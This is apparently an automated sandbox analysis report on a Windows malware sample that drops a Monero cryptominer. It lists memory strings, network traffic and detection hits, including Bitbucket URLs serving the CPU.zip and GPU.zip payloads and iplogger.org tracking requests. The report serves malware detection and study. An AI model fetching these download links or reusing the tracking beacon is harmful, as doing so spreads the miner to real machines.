Source: pj31M24DLn.exe, 00000001.00000003.230977792.0000000008599000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: pj31M24DLn.exe, 00000001.00000003.231181486.0000000008597000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/$
Source: pj31M24DLn.exe, 00000001.00000003.230977792.0000000008599000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/=
Source: pj31M24DLn.exe, 00000001.00000003.230977792.0000000008599000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/?
Source: pj31M24DLn.exe, 00000001.00000003.230977792.0000000008599000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/y
Source: pj31M24DLn.exe, 00000001.00000003.231181486.0000000008597000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/p
Source: pj31M24DLn.exe, 00000001.00000003.230546787.0000000008594000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/t
Source: pj31M24DLn.exe, 00000001.00000003.231181486.0000000008597000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/y
Source: Database.exe, 00000008.00000002.296487557.00007FF67BC26000.00000004.00020000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: Database.exe, 00000008.00000002.296487557.00007FF67BC26000.00000004.00020000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html.
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: pj31M24DLn.exe, 00000005.00000003.484792621.00000000013B0000.00000004.00000001.sdmp, System.exe, 0000002A.00000002.499996807.00000000018E7000.00000004.00000020.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com
Source: pj31M24DLn.exe, 00000005.00000003.440474725.0000000001377000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3
Source: pj31M24DLn.exe, 00000005.00000003.277078066.00000000012DB000.00000004.00000001.sdmp, pj31M24DLn.exe, 00000005.00000003.349688287.0000000001379000.00000004.00000001.sdmp, System.exe, 0000002A.00000003.343281097.0000000001876000.00000004.00000001.sdmp, System.exe, 0000002A.00000003.335795839.0000000001876000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: pj31M24DLn.exe, 00000005.00000003.277078066.00000000012DB000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/(
Source: pj31M24DLn.exe, 00000005.00000003.277078066.00000000012DB000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/2
Source: pj31M24DLn.exe, 00000005.00000003.440748300.00000000013BF000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/79feac9c-dc6c-477f-b03f-5
Source: pj31M24DLn.exe, 00000005.00000003.470837332.0000000001377000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/79feac9c-dc6c-477f-b03f-560ce7ecdcdb/dow
Source: System.exe, 0000002A.00000003.437449501.000000000189C000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/79feac9c-dc6c-477f-b03f-560ce7ecdcdb/down
Source: pj31M24DLn.exe, 00000005.00000003.440748300.00000000013BF000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/79feac9c-dc6c-477f-b03f-560ce7ecdcdb/downloads/47
Source: System.exe, 0000002A.00000003.444049482.00000000018ED000.00000004.00000001.sdmp, System.exe, 0000002A.00000003.343103483.0000000001862000.00000004.00000001.sdmp, System.exe, 0000002A.00000003.488417391.00000000018E7000.00000004.00000001.sdmp, System.exe, 0000002A.00000003.431263357.0000000001918000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/79feac9c-dc6c-477f-b03f-560ce7ecdcdb/downloads/477e5681-f252-
Source: System.exe, 0000002A.00000003.335890699.000000000189C000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/79feac9c-dc6c-477f-b03f-560ce7ecdcdb/downloads/5c90847c-6fca-
Source: pj31M24DLn.exe, 00000005.00000003.349688287.0000000001379000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/79feac9c-dc6c-477f-b03f-5C
Source: pj31M24DLn.exe, 00000005.00000003.277078066.00000000012DB000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/I
Source: pj31M24DLn.exe, 00000005.00000003.277078066.00000000012DB000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/t
Source: pj31M24DLn.exe, 00000005.00000003.429685705.00000000013B8000.00000004.00000001.sdmp	String found in binary or memory: https://bhttps://bbuseruploads.s3.amazonaws.com/79feac9c-dc6c-477f-b03f-560ce7ecdcdb/downloads/5c908
Source: pj31M24DLn.exe, 00000005.00000003.440474725.0000000001377000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.or
Source: pj31M24DLn.exe, 00000005.00000002.495750387.0000000001237000.00000004.00000020.sdmp, pj31M24DLn.exe, 00000005.00000003.440829810.00000000013D9000.00000004.00000001.sdmp, pj31M24DLn.exe, 00000005.00000003.470692634.00000000012F9000.00000004.00000001.sdmp, pj31M24DLn.exe, 00000005.00000003.447247554.00000000013D9000.00000004.00000001.sdmp, System.exe, 0000002A.00000003.488359293.000000000189C000.00000004.00000001.sdmp, System.exe, 0000002A.00000003.488637129.0000000001937000.00000004.00000001.sdmp, System.exe, 0000002A.00000003.343281097.0000000001876000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/
Source: pj31M24DLn.exe, 00000005.00000003.403789831.0000000001377000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/$a
Source: pj31M24DLn.exe, 00000005.00000003.403789831.0000000001377000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/3321935-2125563209-4053062332-1002
Source: pj31M24DLn.exe, 00000005.00000002.497591271.00000000013D8000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/:
Source: pj31M24DLn.exe, 00000005.00000003.470593774.00000000013D9000.00000004.00000001.sdmp, pj31M24DLn.exe, 00000005.00000003.440829810.00000000013D9000.00000004.00000001.sdmp, pj31M24DLn.exe, 00000005.00000003.403789831.0000000001377000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/Data
Source: pj31M24DLn.exe, 00000005.00000002.495889503.00000000012A6000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/E
Source: pj31M24DLn.exe, 00000005.00000003.302025220.000000000133C000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/M
Source: pj31M24DLn.exe, 00000005.00000003.393930185.0000000001377000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/Ya
Source: System.exe, 0000002A.00000003.488359293.000000000189C000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/a
Source: pj31M24DLn.exe, 00000005.00000002.495750387.0000000001237000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/b
Source: System.exe, 0000002A.00000003.343281097.0000000001876000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/c
Source: pj31M24DLn.exe, 00000005.00000003.484518263.00000000013E1000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscre
Source: pj31M24DLn.exe, pj31M24DLn.exe, 00000005.00000003.393725666.00000000013C0000.00000004.00000001.sdmp, pj31M24DLn.exe, 00000005.00000002.497591271.00000000013D8000.00000004.00000020.sdmp, System.exe, System.exe, 0000002A.00000003.465320829.00000000018EF000.00000004.00000001.sdmp, System.exe, 0000002A.00000003.444049482.00000000018ED000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zip
Source: pj31M24DLn.exe, 00000005.00000003.393725666.00000000013C0000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zip$
Source: pj31M24DLn.exe, 00000005.00000003.411819516.00000000013BE000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zip.
Source: System.exe, 0000002A.00000003.465320829.00000000018EF000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zip0
Source: pj31M24DLn.exe, 00000005.00000002.495889503.00000000012A6000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zip02
Source: pj31M24DLn.exe, 00000005.00000003.470651606.00000000012EA000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zip03f-560ce7ecdcdb/downloads/477e5681-f252-4
Source: pj31M24DLn.exe, 00000005.00000003.403644086.00000000012EA000.00000004.00000001.sdmp, pj31M24DLn.exe, 00000005.00000002.496073024.00000000012ED000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zip03f-560ce7ecdcdb/downloads/5c90847c-6fca-4
Source: System.exe, 0000002A.00000003.343435775.00000000018A5000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zip6
Source: pj31M24DLn.exe, 00000005.00000002.497591271.00000000013D8000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zip:
Source: pj31M24DLn.exe, 00000005.00000003.393725666.00000000013C0000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zipCd
Source: pj31M24DLn.exe, 00000005.00000003.411819516.00000000013BE000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zipD
Source: System.exe, 0000002A.00000003.444049482.00000000018ED000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zipP
Source: pj31M24DLn.exe, 00000005.00000003.411819516.00000000013BE000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zipT
Source: pj31M24DLn.exe, 00000005.00000003.411819516.00000000013BE000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zipd
Source: pj31M24DLn.exe, 00000005.00000002.495889503.00000000012A6000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zipe
Source: pj31M24DLn.exe, 00000005.00000002.497591271.00000000013D8000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.ziphell
Source: pj31M24DLn.exe, 00000005.00000003.317051161.000000000133C000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zipj
Source: System.exe, 0000002A.00000003.465320829.00000000018EF000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zipp
Source: pj31M24DLn.exe, 00000005.00000002.497591271.00000000013D8000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zipt
Source: pj31M24DLn.exe, 00000005.00000002.497591271.00000000013D8000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/CPU.zipw
Source: pj31M24DLn.exe, pj31M24DLn.exe, 00000005.00000003.440474725.0000000001377000.00000004.00000001.sdmp, pj31M24DLn.exe, 00000005.00000003.307301937.000000000133C000.00000004.00000001.sdmp, System.exe, System.exe, 0000002A.00000003.461653504.00000000018EF000.00000004.00000001.sdmp, System.exe, 0000002A.00000003.444049482.00000000018ED000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zip
Source: pj31M24DLn.exe, 00000005.00000003.390061068.00000000013C0000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zip$
Source: pj31M24DLn.exe, 00000005.00000003.440474725.0000000001377000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zip$R
Source: pj31M24DLn.exe, 00000005.00000003.302025220.000000000133C000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zip(
Source: System.exe, 0000002A.00000003.461653504.00000000018EF000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zip0
Source: System.exe, 0000002A.00000002.499229556.0000000001808000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zip02
Source: pj31M24DLn.exe, 00000005.00000003.403658835.00000000012EF000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zip03f-560ce7ecdcdb/downloads/477e5681-f252-4
Source: pj31M24DLn.exe, 00000005.00000003.454080805.00000000012EC000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zip03f-560ce7ecdcdb/downloads/5c90847c-6fca-4
Source: pj31M24DLn.exe, 00000005.00000003.470593774.00000000013D9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipA
Source: pj31M24DLn.exe, 00000005.00000003.390061068.00000000013C0000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipCd
Source: pj31M24DLn.exe, 00000005.00000003.440696731.00000000013EA000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipDaK
Source: pj31M24DLn.exe, 00000005.00000003.411819516.00000000013BE000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipE
Source: System.exe, 0000002A.00000002.499351188.0000000001826000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipFMC
Source: System.exe, 0000002A.00000003.488637129.0000000001937000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipK
Source: pj31M24DLn.exe, 00000005.00000003.470593774.00000000013D9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipR
Source: pj31M24DLn.exe, 00000005.00000003.408364960.00000000013BE000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipT
Source: pj31M24DLn.exe, 00000005.00000002.495889503.00000000012A6000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipU
Source: pj31M24DLn.exe, 00000005.00000003.307301937.000000000133C000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipZ
Source: pj31M24DLn.exe, 00000005.00000003.363681052.0000000001322000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipa
Source: pj31M24DLn.exe, 00000005.00000003.403620403.00000000013C0000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipd
Source: pj31M24DLn.exe, 00000005.00000003.307301937.000000000133C000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipe
Source: pj31M24DLn.exe, 00000005.00000003.363681052.0000000001322000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipe?
Source: pj31M24DLn.exe, 00000005.00000003.403704253.0000000001304000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipeC
Source: pj31M24DLn.exe, 00000005.00000003.363681052.0000000001322000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipg
Source: pj31M24DLn.exe, 00000001.00000002.249266114.00000000047F6000.00000004.00000001.sdmp, pj31M24DLn.exe, 00000005.00000002.492645435.0000000000400000.00000040.00000001.sdmp, System.exe, 00000009.00000002.311185589.00000000041A6000.00000004.00000001.sdmp, System.exe, 0000002A.00000002.493679165.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.ziphttps://bitbucket.org/gmclogscrew/asdasd/d
Source: pj31M24DLn.exe, 00000005.00000003.470593774.00000000013D9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipi
Source: pj31M24DLn.exe, 00000005.00000003.440696731.00000000013EA000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipil
Source: pj31M24DLn.exe, 00000005.00000003.307301937.000000000133C000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipj
Source: System.exe, 0000002A.00000003.488637129.0000000001937000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipk
Source: pj31M24DLn.exe, 00000005.00000003.390091423.000000000132C000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipl6
Source: pj31M24DLn.exe, 00000005.00000003.440829810.00000000013D9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipr
Source: pj31M24DLn.exe, 00000005.00000003.393725666.00000000013C0000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipst
Source: pj31M24DLn.exe, 00000005.00000003.403789831.0000000001377000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipstemd
Source: pj31M24DLn.exe, 00000005.00000003.317051161.000000000133C000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipt
Source: System.exe, 0000002A.00000002.498958735.00000000017B8000.00000004.00000020.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipta=
Source: System.exe, 0000002A.00000003.488637129.0000000001937000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.ziptaAPPDATA=C:
Source: pj31M24DLn.exe, 00000005.00000003.317051161.000000000133C000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/gmclogscrew/asdasd/downloads/GPU.zipu
Source: System.exe, 0000002A.00000003.343281097.0000000001876000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/h
Source: pj31M24DLn.exe, 00000005.00000003.470593774.00000000013D9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/mclogscrew/asdasd/downloads/GPU.zipstemd
Source: pj31M24DLn.exe, 00000005.00000003.363766362.0000000001377000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/mclogscrew/asdasd/downloads/GPU.zipxt
Source: pj31M24DLn.exe, 00000005.00000003.470692634.00000000012F9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/s
Source: Database.exe, 00000008.00000003.280669016.0000014CD8B70000.00000004.00000001.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: System.exe, 0000002A.00000002.499996807.00000000018E7000.00000004.00000020.sdmp	String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: pj31M24DLn.exe, 00000005.00000002.495847009.0000000001288000.00000004.00000020.sdmp, System.exe, 0000002A.00000002.499229556.0000000001808000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/
Source: System.exe, 0000002A.00000002.499229556.0000000001808000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1
Source: pj31M24DLn.exe, 00000005.00000002.495750387.0000000001237000.00000004.00000020.sdmp, System.exe, 0000002A.00000002.498958735.00000000017B8000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1bUgq7
Source: pj31M24DLn.exe, 00000005.00000002.495750387.0000000001237000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1bUgq7h
Source: pj31M24DLn.exe, 00000005.00000003.277078066.00000000012DB000.00000004.00000001.sdmp, System.exe, 0000002A.00000003.335775850.0000000001868000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com
Source: pj31M24DLn.exe, 00000005.00000003.454050607.00000000012E5000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.comVX
Source: pj31M24DLn.exe, 00000005.00000002.495889503.00000000012A6000.00000004.00000020.sdmp, System.exe, 0000002A.00000002.499351188.0000000001826000.00000004.00000020.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: pj31M24DLn.exe, 00000005.00000003.484792621.00000000013B0000.00000004.00000001.sdmp, System.exe, 0000002A.00000002.499996807.00000000018E7000.00000004.00000020.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
Source: pj31M24DLn.exe, 00000005.00000003.408769431.000000000138F000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com
Source: pj31M24DLn.exe, 00000005.00000002.495847009.0000000001288000.00000004.00000020.sdmp, System.exe, 0000002A.00000003.488637129.0000000001937000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: Datahub.exe, 0000000C.00000000.295411010.0000000000958000.00000002.00020000.sdmp	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: Datahub.exe, Datahub.exe, 0000000C.00000000.295411010.0000000000958000.00000002.00020000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: Datahub.exe, 0000000C.00000000.295411010.0000000000958000.00000002.00020000.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: Datahub.exe, 0000000C.00000000.295411010.0000000000958000.00000002.00020000.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown

DNS traffic detected: queries for: iplogger.org

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Source: global traffic	HTTP traffic detected: GET /1bUgq7 HTTP/1.1Content-Type: text/htmlMySpecialHeder: whateverUser-Agent: RunHost: iplogger.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1bUgq7 HTTP/1.1Content-Type: text/htmlMySpecialHeder: whateverUser-Agent: RunHost: iplogger.orgCache-Control: no-cacheCookie: clhf03028ja=84.17.52.77

Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.108.52:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49714 version: TLS 1.2

Source: System.exe, 00000009.00000002.308076233.0000000000BDB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: cmd.exe

Process created: 54

System Summary:

Malicious sample detected (through community Yara rule)

Source: 12.0.Datahub.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 12.2.Datahub.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth

.NET source code contains very large array initializations

Source: pj31M24DLn.exe, BitConvert/UInt32ArrayTypeIn.cs

Large array initialization: ?????????????????????????????????????????: array initializer size 7952

PE file contains section with special chars

Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06524B68	1_2_06524B68
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_065293B6	1_2_065293B6
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06525030	1_2_06525030
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_0652B5F0	1_2_0652B5F0
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_065291B1	1_2_065291B1
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06524242	1_2_06524242
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06524278	1_2_06524278
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_065252D8	1_2_065252D8
